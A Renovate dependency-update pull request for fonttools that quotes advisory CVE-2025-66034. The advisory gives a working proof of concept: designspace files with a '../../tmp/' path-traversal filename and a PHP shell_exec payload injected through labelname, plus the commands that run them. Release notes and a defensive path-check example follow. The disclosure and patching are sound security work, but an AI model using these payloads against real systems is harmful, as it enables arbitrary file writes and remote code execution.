@renovate renovate bot commented Dec 2, 2025

This PR contains the following updates:

Package: fonttools
Change: ==4.44.0 -> ==4.60.2

GitHub Vulnerability Alerts

CVE-2025-66034

Summary

The fonttools varLib (or python3 -m fontTools.varLib) script has an arbitrary file write vulnerability that leads to remote code execution when a malicious .designspace file is processed. The vulnerability affects the main() code path of fontTools.varLib, used by the fonttools varLib CLI and any code that invokes fontTools.varLib.main().

The vulnerability exists due to unsanitised filename handling combined with content injection. Attackers can write files to arbitrary filesystem locations via path traversal sequences, and inject malicious code (like PHP) into the output files through XML injection in labelname elements. When these files are placed in web-accessible locations and executed, this achieves remote code execution without requiring any elevated privileges. Once RCE is obtained, attackers can further escalate privileges to compromise system files (like overwriting /etc/passwd).

Overall this allows attackers to:

  • Write font files to arbitrary locations on the filesystem
  • Overwrite configuration files
  • Corrupt application files and dependencies
  • Obtain remote code execution

The attacker controls the file location, extension and contents which could lead to remote code execution as well as enabling a denial of service through file corruption means.

Affected Lines

fontTools/varLib/__init__.py

filename = vf.filename # Unsanitised filename
output_path = os.path.join(output_dir, filename) # Path traversal
vf.save(output_path) # Arbitrary file write

PoC

  1. Set up malicious.designspace and respective source-*.ttf files in a directory like /Users/<username>/testing/demo/ (will impact relative file location within malicious.designspace)

setup.py

#!/usr/bin/env python3
import os

from fontTools.fontBuilder import FontBuilder
from fontTools.pens.ttGlyphPen import TTGlyphPen

def create_source_font(filename, weight=400):
    fb = FontBuilder(unitsPerEm=1000, isTTF=True)
    fb.setupGlyphOrder([".notdef"])
    fb.setupCharacterMap({})
    
    pen = TTGlyphPen(None)
    pen.moveTo((0, 0))
    pen.lineTo((500, 0))
    pen.lineTo((500, 500))
    pen.lineTo((0, 500))
    pen.closePath()
    
    fb.setupGlyf({".notdef": pen.glyph()})
    fb.setupHorizontalMetrics({".notdef": (500, 0)})
    fb.setupHorizontalHeader(ascent=800, descent=-200)
    fb.setupOS2(usWeightClass=weight)
    fb.setupPost()
    fb.setupNameTable({"familyName": "Test", "styleName": f"Weight{weight}"})
    fb.save(filename)

if __name__ == '__main__':
    os.chdir(os.path.dirname(os.path.abspath(__file__)))
    create_source_font("source-light.ttf", weight=100)
    create_source_font("source-regular.ttf", weight=400)

malicious.designspace

<?xml version='1.0' encoding='UTF-8'?>
<designspace format="5.0">
  <axes>
    <axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"/>
  </axes>
  
  <sources>
    <source filename="source-light.ttf" name="Light">
      <location>
        <dimension name="Weight" xvalue="100"/>
      </location>
    </source>
    <source filename="source-regular.ttf" name="Regular">
      <location>
        <dimension name="Weight" xvalue="400"/>
      </location>
    </source>
  </sources>
  
  <!-- Filename can be arbitrarily set to any path on the filesystem -->
  <variable-fonts>
    <variable-font name="MaliciousFont" filename="../../tmp/newarbitraryfile.json">
      <axis-subsets>
        <axis-subset name="Weight"/>
      </axis-subsets>
    </variable-font>
  </variable-fonts>
</designspace>

Optional: You can put a file with any material within ../../tmp/newarbitraryfile.json in advance, the contents in the file will be overwritten after running the setup script in the following step.

  1. Run the setup.py script to generate source-*.ttf files required for the malicious.designspace file.
python3 setup.py
  1. Execute the given payload using the vulnerable varLib saving the file into the arbitrary file location of filename
fonttools varLib malicious.designspace
  1. Validate arbitrary file write was performed by looking at path assigned within malicious designspace
cat 
  1. After validating that we can provide arbitrary write to any location, we can also validate that we can control sections of content as well demonstrated with the below payload.

malicious2.designspace

<?xml version='1.0' encoding='UTF-8'?>
<designspace format="5.0">
	<axes>
        <!-- XML injection occurs in labelname elements with CDATA sections -->
	    <axis tag="wght" name="Weight" minimum="100" maximum="900" default="400">
	        <labelname xml:lang="en"><![CDATA[<?php echo shell_exec("/usr/bin/touch /tmp/MEOW123");?>]]]]><![CDATA[>]]></labelname>
	        <labelname xml:lang="fr">MEOW2</labelname>
	    </axis>
	</axes>
	<axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"/>
	<sources>
		<source filename="source-light.ttf" name="Light">
			<location>
				<dimension name="Weight" xvalue="100"/>
			</location>
		</source>
		<source filename="source-regular.ttf" name="Regular">
			<location>
				<dimension name="Weight" xvalue="400"/>
			</location>
		</source>
	</sources>
	<variable-fonts>
		<variable-font name="MyFont" filename="output.ttf">
			<axis-subsets>
				<axis-subset name="Weight"/>
			</axis-subsets>
		</variable-font>
	</variable-fonts>
	<instances>
		<instance name="Display Thin" familyname="MyFont" stylename="Thin">
			<location><dimension name="Weight" xvalue="100"/></location>
			<labelname xml:lang="en">Display Thin</labelname>
		</instance>
	</instances>
</designspace>
  1. When the program is run, we can show we control the contents in the new file
fonttools varLib malicious2.designspace -o file123

Here being outputted to a localised area ignoring filename presented in variable-font

  1. We can look inside file123 to validate user controlled injection
cat file123

to show <?php echo shell_exec("/usr/bin/touch /tmp/MEOW123");?>]]>

  1. Executing the file and looking at the newly generated file
php file123
ls -la /tmp/MEOW123

we can see that the file was just created showing RCE.

Recommendations

  • Ensure output file paths configured within designspace files are restricted to the local directory or consider further security measures to prevent arbitrary file write/overwrite within any directory on the system

Release Notes

fonttools/fonttools (fonttools)

v4.60.2

  • Backport release Same as 4.61.0 but without "Drop support for EOL Python 3.9" change to allow downstream projects still on Python 3.9 to avail of the security fix for CVE-2025-66034 (#​3994, #​3999).

v4.60.1

  • [ufoLib] Reverted accidental method name change in UFOReader.getKerningGroupConversionRenameMaps
    that broke compatibility with downstream projects like defcon (#​3948, #​3947, robotools/defcon#478).
  • [ufoLib] Added test coverage for getKerningGroupConversionRenameMaps method (#​3950).
  • [subset] Don't try to subset BASE table; pass it through by default instead (#​3949).
  • [subset] Remove empty BaseRecord entries in MarkBasePos lookups (#​3897, #​3892).
  • [subset] Add pruning for MarkLigPos and MarkMarkPos lookups (#​3946).
  • [subset] Remove duplicate features when subsetting (#​3945).
  • [Docs] Added documentation for the visitor module (#​3944).

v4.60.0

  • [pointPen] Allow reverseFlipped parameter of DecomposingPointPen to take a ReverseFlipped enum value to control whether/how to reverse contour direction of flipped components, in addition to the existing True/False. This allows to set ReverseFlipped.ON_CURVE_FIRST to ensure that the decomposed outline starts with an on-curve point before being reversed, for better consistency with other segment-oriented contour transformations. The change is backward compatible, and the default behavior hasn't changed (#​3934).

  • [filterPen] Added ContourFilterPointPen, base pen for buffered contour operations, and OnCurveStartPointPen filter to ensure contours start with an on-curve point (#​3934).

  • [cu2qu] Fixed difference in cython vs pure-python complex division by real number (#​3930).

  • [varLib.avar] Refactored and added some new sub-modules and scripts (#​3926).

    • varLib.avar.build module to build avar (and a missing fvar) binaries into a possibly empty TTFont,
    • varLib.avar.unbuild module to print a .designspace snippet that would generate the same avar binary,
    • varLib.avar.map module to take TTFont and do the mapping, in user/normalized space,
    • varLib.avar.plan module moved from varLib.avarPlanner.

    The bare fonttools varLib.avar script is deprecated, in favour of fonttools varLib.avar.build (or unbuild).

  • [interpolatable] Clarify linear_sum_assignment backend options and minimal dependency usage (#​3927).

  • [post] Speed up build_psNameMapping (#​3923).

  • [ufoLib] Added typing annotations to fontTools.ufoLib (#​3875).

v4.59.2

  • [varLib] Clear USE_MY_METRICS component flags when inconsistent across masters (#​3912).
  • [varLib.instancer] Avoid negative advance width/height values when instantiating HVAR/VVAR (unlikely in well-behaved fonts) (#​3918).
  • [subset] Fix shaping behaviour when pruning empty mark sets (#​3915, harfbuzz/harfbuzz#5499).
  • [cu2qu] Fixed dot() product of perpendicular vectors not always returning exactly 0.0 in all Python implementations (#​3911)
  • [varLib.instancer] Implemented fully-instantiating avar2 fonts (#​3909).
  • [feaLib] Allow float values in VariableScalar's axis locations (#​3906, #​3907).
  • [cu2qu] Handle special case in calc_intersect for degenerate cubic curves where 3 to 4 control points are equal (#​3904).

v4.59.1

  • [featureVars] Update OS/2.usMaxContext if possible after addFeatureVariationsRaw (#​3894).
  • [vhmtx] raise TTLibError('not enough data...') when hmtx/vmtx are truncated (#​3843, #​3901).
  • [feaLib] Combine duplicate features that have the same set of lookups regardless of the order in which those lookups are added to the feature (#​3895).
  • [varLib] Deprecate varLib.mutator in favor of varLib.instancer. The latter provides equivalent full (static font) instancing in addition to partial VF instancing.
    CLI users should replace fonttools varLib.mutator with fonttools varLib.instancer. API users should migrate to fontTools.varLib.instancer.instantiateVariableFont (#​2680).

v4.59.0

  • Removed hard-dependency on pyfilesystem2 (fs package) from fonttools[ufo] extra. This is replaced by the fontTools.misc.filesystem package, a stdlib-only, drop-in replacement for the subset of the pyfilesystem2's API used by fontTools.ufoLib. The latter should continue to work with the upstream fs (we even test with/without). However, clients who wish to continue using fs can do so by depending on it directly instead of via the fonttools[ufo] extra (#​3885, #​3620).
  • [xmlWriter] Replace illegal XML characters (e.g. control or non-characters) with "?" when dumping to ttx (#​3868, #​71).
  • [varLib.hvar] Fixed vertical metrics fields copy/pasta error (#​3884).
  • Micro optimizations in ttLib and sstruct modules (#​3878, #​3879).
  • [unicodedata] Add Garay script to RTL_SCRIPTS (#​3882).
  • [roundingPen] Remove unreliable kwarg usage. Argument names aren’t consistent among point pens’ .addComponent() implementations, in particular baseGlyphName vs glyphName (#​3880).

v4.58.5

  • [feaLib] Don't try to combine ligature & multisub rules (#​3874).
  • [feaLib/ast] Use weakref proxies to avoid cycles in visitor (#​3873).
  • [varLib.instancer] Fixed instancing CFF2 fonts where VarData contains more than 64k items (#​3858).

v4.58.4

  • [feaLib] Fixed iterable check for Python 3.13.4 and newer (#​3854, #​3855).

v4.58.3

  • [feaLib] Fixed iterable check for Python 3.13.4 and newer (#​3854, #​3855).

v4.58.2

  • [ttLib.reorderGlyphs] Handle CFF2 when reordering glyphs (#​3852)
  • [subset] Copy name IDs in use before scrapping or scrambling them for webfonts (#​3853)

v4.58.1

  • [varLib] Make sure that fvar named instances only reuse name ID 2 or 17 if they are at the default location across all axes, to match OT spec requirement (#​3831).
  • [feaLib] Improve single substitution promotion to multiple/ligature substitutions, fixing a few bugs as well (#​3849).
  • [loggingTools] Make Timer._time a static method that doesn't take self, makes it easier to override (#​3836).
  • [featureVars] Use None for empty ConditionSet, which translates to a null offset in the compiled table (#​3850).
  • [feaLib] Raise an error on conflicting ligature substitution rules instead of silently taking the last one (#​3835).
  • Add typing annotations to T2CharStringPen (#​3837).
  • [feaLib] Add single substitutions that were promoted to multiple or ligature substitutions to aalt feature (#​3847).
  • [featureVars] Create a default LangSys in a ScriptRecord if missing when adding feature variations to existing GSUB later in the build (#​3838).
  • [symfont] Added a main().
  • [cffLib.specializer] Fix rmoveto merging when blends used (#​3839, #​3840).
  • [pyftmerge] Add support for cmap format 14 in the merge tool (#​3830).
  • [varLib.instancer/cff2] Fix vsindex of Private dicts when instantiating (#​3828, #​3232).
  • Update text file read to use UTF-8 with optional BOM so it works with e.g. Windows Notepad.exe (#​3824).
  • [varLib] Ensure that instances only reuse name ID 2 or 17 if they are at the default location across all axes (#​3831).
  • [varLib] Create a dflt LangSys in a ScriptRecord when adding variations later, to fix an avoidable crash in an edge case (#​3838).

v4.58.0

  • Drop Python 3.8, require 3.9+ (#​3819)
  • [HVAR, VVAR] Prune unused regions when using a direct mapping (#​3797)
  • [Docs] Improvements to ufoLib documentation (#​3721)
  • [Docs] Improvements to varLib documentation (#​3727)
  • [Docs] Improvements to Pens and pen-module documentation (#​3724)
  • [Docs] Miscellany updates to docs (misc modules and smaller modules) (#​3730)
  • [subset] Close codepoints over BiDi mirror variants. (#​3801)
  • [feaLib] Fix serializing ChainContextPosStatement and ChainContextSubstStatement in some rare cases (#​3788)
  • [designspaceLib] Clarify user expectations for getStatNames (#​2892)
  • [GVAR] Add support for new GVAR table (#​3728)
  • [TSI0, TSI5] Derive number of entries to decompile from data length (#​2477)
  • [ttLib] Fix AttributeError when reporting table overflow (#​3808)
  • [ttLib] Apply rounding more often in getCoordinates (#​3798)
  • [ttLib] Ignore component bounds if empty (#​3799)
  • [ttLib] Change the separator for duplicate glyph names from "#" to "." (#​3809)
  • [feaLib] Support subtable breaks in CursivePos, MarkBasePos, MarkToLigPos and MarkToMarkPos lookups (#​3800, #​3807)
  • [feaLib] If the same lookup has single substitutions and ligature substitutions, upgrade single substitutions to ligature substitutions with one input glyph (#​3805)
  • [feaLib] Correctly handle <NULL> in single pos lookups (#​3803)
  • [feaLib] Remove duplicates from class pair pos classes instead of raising an error (#​3804)
  • [feaLib] Support creating extension lookups using useExtension lookup flag
    instead of silently ignoring it (#​3811)
  • [STAT] Add typing for the simpler STAT arguments (#​3812)
  • [otlLib.builder] Add future import for annotations (#​3814)
  • [cffLib] Fix reading supplement encoding (#​3813)
  • [voltLib] Add some missing functionality and fixes to voltLib and VoltToFea, making the conversion to feature files more robust. Add also fonttools voltLib command line tool to compile VOLT sources directly (doing an intermediate fea conversion internally) (#​3818)
  • [pens] Add some PointPen annotations (#​3820)

v4.57.0

  • [ttLib.__main__] Add --no-recalc-timestamp flag (#​3771)
  • [ttLib.__main__] Add -b (recalcBBoxes=False) flag (#​3772)
  • [cmap] Speed up glyphOrder loading from cmap (#​3774)
  • [ttLib.__main__] Improvements around the -t flag (#​3776)
  • [Debg] Fix parsing from XML; add roundtrip tests (#​3781)
  • [fealib] Support *Base.MinMax tables (#​3783, #​3786)
  • [config] Add OPTIMIZE_FONT_SPEED (#​3784)
  • [varLib.hvar] New module to add HVAR table to the font (#​3780)
  • [otlLib.optimize] Fix crash when the provided TTF does not contain a GPOS (#​3794)

v4.56.0

  • [varStore] Sort the input todo list with the same sorting key used for the optimizer's output (#​3767).
  • [otData] Fix DeviceTable's DeltaValue repeat value which caused a crash after importing from XML and then compiling a GPOS containing Device tables (#​3758).
  • [feaLib] Make FeatureLibError pickleable, so client can e.g. use feaLib to compile features in parallel with multiprocessing (#​3762).
  • [varLib/gvar] Removed workaround for old, long-fixed macOS bug about composite glyphs with all zero deltas (#​1381, #​1788).
  • [Docs] Updated ttLib documentation, beefed up TTFont and TTGlyphSet explanations (#​3720).

v4.55.8

  • [MetaTools] Fixed bug in buildUCD.py script whereby the first non-header line of some UCD text file was being skipped. This affected in particular the U+00B7 (MIDDLE DOT) entry of ScriptExtensions.txt (#​3756).

v4.55.7

  • Shorten the changelog included in PyPI package description to accommodate maximum length limit imposed by Azure DevOps. No actual code changes since v4.55.6 (#​3754).

v4.55.6

  • [glyf] Fixed regression introduced in 4.55.5 when computing bounds of nested composite glyphs with transformed components (#​3752).

v4.55.5

  • [glyf] Fixed recalcBounds of transformed components with unrounded coordinates (#​3750).
  • [feaLib] Allow duplicate script/language statements (#​3749).

v4.55.4

  • [bezierTools] Fixed splitCubicAtT sometimes not returning identical start/end points as result of numerical precision (#​3742, #​3743).
  • [feaLib/ast] Fixed docstring of AlternateSubstStatement (#​3735).
  • [transform] Typing fixes (#​3734).

v4.55.3

  • [Docs] fill out ttLib table section [#​3716]
  • [feaLib] More efficient inline format 4 lookups [#​3726]

v4.55.2

  • [Docs] update Sphinx config (#​3712)
  • [designspaceLib] Allow axisOrdering to be set to zero (#​3715)
  • [feaLib] Don’t modify variable anchors in place (#​3717)

v4.55.1

  • [ttGlyphSet] Support VARC CFF2 fonts (#​3683)
  • [DecomposedTransform] Document and implement always skewY == 0 (#​3697)
  • [varLib] "Fix" cython iup issue? (#​3704)
  • Cython minor refactor (#​3705)

v4.55.0

  • [cffLib.specializer] Adjust stack use calculation (#​3689)
  • [varLib] Lets not add mac names if the rest of name doesn't have them (#​3688)
  • [ttLib.reorderGlyphs] Update CFF table charstrings and charset (#​3682)
  • [cffLib.specializer] Add cmdline to specialize a CFF2 font (#​3675, #​3679)
  • [CFF2] Lift uint16 VariationStore.length limitation (#​3674)
  • [subset] consider variation selectors subsetting cmap14 (#​3672)
  • [varLib.interpolatable] Support CFF2 fonts (#​3670)
  • Set isfinal to true in XML parser for proper resource cleanup (#​3669)
  • [removeOverlaps] Fix CFF CharString width (#​3659)
  • [glyf] Add optimizeSize option (#​3657)
  • Python 3.13 support (#​3656)
  • [TupleVariation] Optimize for loading speed, not size (#​3650, #​3653)

v4.54.1

  • [unicodedata] Update to Unicode 16
  • [subset] Escape \ in doc string

v4.54.0

v4.53.1

  • [feaLib] Improve the sharing of inline chained lookups (#​3559)
  • [otlLib] Correct the calculation of OS/2.usMaxContext with reversed chaining contextual single substitutions (#​3569)
  • [misc.visitor] Visitors search the inheritance chain of objects they are visiting (#​3581)

v4.53.0

  • [ttLib.removeOverlaps] Support CFF table to aid in downconverting CFF2 fonts (#​3528)
  • [avar] Fix crash when accessing not-yet-existing attribute (#​3550)
  • [docs] Add buildMathTable to otlLib.builder documentation (#​3540)
  • [feaLib] Allow UTF-8 with BOM when reading features (#​3495)
  • [SVGPathPen] Revert rounding coordinates to two decimal places by default (#​3543)
  • [varLib.instancer] Refix output filename decision-making (#​3545, #​3544, #​3548)

v4.52.4

  • [varLib.cff] Restore and deprecate convertCFFtoCFF2 that was removed in 4.52.0 release as it is used by downstream projects (#​3535).

v4.52.3

Fixed a small syntax error in the reStructuredText-formatted NEWS.rst file which caused the upload to PyPI to fail for 4.52.2. No other code changes.

v4.52.1

Fixed a small syntax error in the reStructuredText-formatted NEWS.rst file which caused the upload to PyPI to fail for 4.52.0.
No other code changes.

v4.51.0

  • [ttLib] Optimization on loading aux fields (#​3464).
  • [ttFont] Add reorderGlyphs (#​3468).

v4.50.0

  • [pens] Added decomposing filter pens that draw components as regular contours (#​3460).
  • [instancer] Drop explicit no-op axes from TupleVariations (#​3457).
  • [cu2qu/ufo] Return set of modified glyph names from fonts_to_quadratic (#​3456).

v4.49.0

  • [otlLib] Add API for building MATH table (#​3446)

v4.48.1

  • Fixed uploading wheels to PyPI, no code changes since v4.48.0.

v4.47.2

Minor release to fix uploading wheels to PyPI.

v4.47.0

  • [varLib.models] New API for VariationModel: getMasterScalars and interpolateFromValuesAndScalars.
  • [varLib.interpolatable] Various bugfixes and rendering improvements. In particular, add a Summary page in the front, and an Index and Table-of-Contents in the back. Change the page size to Letter.
  • [Docs/designspaceLib] Defined a new public.fontInfo lib key, not used anywhere yet (#​3358).

v4.46.0

  • [featureVars] Allow to register the same set of substitution rules to multiple features. The addFeatureVariations function can now take a list of featureTags; similarly, the lib key 'com.github.fonttools.varLib.featureVarsFeatureTag' can now take a comma-separated string of feature tags (e.g. "salt,ss01") instead of a single tag (#​3360).
  • [featureVars] Don't overwrite GSUB FeatureVariations, but append new records to it for features which are not already there. But raise VarLibError if the feature tag already has feature variations associated with it (#​3363).
  • [varLib] Added addGSUBFeatureVariations function to add GSUB Feature Variations to an existing variable font from rules defined in a DesignSpace document (#​3362).
  • [varLib.interpolatable] Various bugfixes and rendering improvements. In particular, a new test for "underweight" glyphs. The new test reports quite a few false-positives though. Please send feedback.

v4.45.1

  • [varLib.interpolatable] Various bugfixes and improvements, better reporting, reduced false positives.
  • [ttGlyphSet] Added option to not recalculate glyf bounds (#​3348).

v4.45.0

  • [varLib.interpolator] Vastly improved algorithms. Also available now is --pdf and --html options to generate a PDF or HTML report of the interpolation issues.
    The PDF/HTML report showcases the problematic masters, the interpolated broken glyph, as well as the proposed fixed version.

v4.44.3

  • [subset] Only prune codepage ranges for OS/2.version >= 1, ignore otherwise (#​3334).
  • [instancer] Ensure hhea vertical metrics stay in sync with OS/2 ones after instancing MVAR table containing 'hasc', 'hdsc' or 'hlgp' tags (#​3297).

v4.44.1

  • [feaLib] Ensure variable mark anchors are deep-copied while building since they get modified in-place and later reused (#​3330).
  • [OS/2|subset] Added method to recalcCodePageRanges to OS/2 table class; added --prune-codepage-ranges to fonttools subset command (#​3328, #​2607).

NOTE: this release was "yanked" from PyPI because it introduced a regression: #​3334


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


This PR was generated by Mend Renovate. View the repository job log.
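
The containment check that the advisory's recommendation calls for, as an added example: it is not part of the PR or of fonttools, and it is not the upstream fix. The names safe_output_path and audit_designspace are hypothetical, and the sample document is constructed from the advisory's malicious.designspace.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample modelled on the advisory's malicious.designspace;
# the last three entries are added here to exercise the other branches.
SAMPLE_DESIGNSPACE = """<?xml version='1.0' encoding='UTF-8'?>
<designspace format="5.0">
  <variable-fonts>
    <variable-font name="MaliciousFont" filename="../../tmp/newarbitraryfile.json"/>
    <variable-font name="AbsoluteFont" filename="/tmp/absolute.ttf"/>
    <variable-font name="NestedFont" filename="build/MyFont-VF.ttf"/>
    <variable-font name="PlainFont" filename="output.ttf"/>
  </variable-fonts>
</designspace>
"""


def safe_output_path(output_dir, filename):
    """Return the resolved path of filename inside output_dir.

    Raises ValueError when the result would land outside output_dir.
    """
    if not filename or "\x00" in filename:
        raise ValueError("empty or invalid filename")
    base = os.path.realpath(output_dir)
    # os.path.join() silently discards output_dir when filename is absolute,
    # and ".." segments survive the join, so the containment test has to run
    # on the final resolved candidate, not on the raw attribute value.
    candidate = os.path.realpath(os.path.join(base, filename))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"{filename!r} resolves outside {base!r}")
    return candidate


def audit_designspace(xml_text, output_dir):
    """Return (name, filename, verdict) for each <variable-font> with a filename.

    Elements without a filename attribute are out of scope for this check.
    """
    if isinstance(xml_text, str):
        xml_text = xml_text.encode("utf-8")
    root = ET.fromstring(xml_text)
    findings = []
    for vf in root.iter("variable-font"):
        filename = vf.get("filename")
        if filename is None:
            continue
        try:
            safe_output_path(output_dir, filename)
            verdict = "ok"
        except ValueError as exc:
            verdict = f"reject: {exc}"
        findings.append((vf.get("name", ""), filename, verdict))
    return findings


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as out_dir:
        for name, filename, verdict in audit_designspace(SAMPLE_DESIGNSPACE, out_dir):
            print(f"{name:14} {filename:34} {verdict}")
```

This covers the path traversal half of the advisory only; the labelname content injection shown in malicious2.designspace is not addressed by a path check.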

coveralls commented Dec 2, 2025

Pull Request Test Coverage Report for Build 20090478725

Details

  • 0 of 0 changed or added relevant lines in 0 files are covered.
  • No unchanged relevant lines lost coverage.
  • Overall coverage remained the same at 45.841%

Totals Coverage Status
Change from base Build 11621102184: 0.0%
Covered Lines: 237
Relevant Lines: 517

💛 - Coveralls

@renovate renovate bot changed the title chore(deps): update dependency fonttools to v4.61.0 [security] chore(deps): update dependency fonttools to v4.60.2 [security] Dec 10, 2025
@renovate renovate bot force-pushed the renovate/pypi-fonttools-vulnerability branch from 0558100 to 4ebce20 Compare December 10, 2025 07:14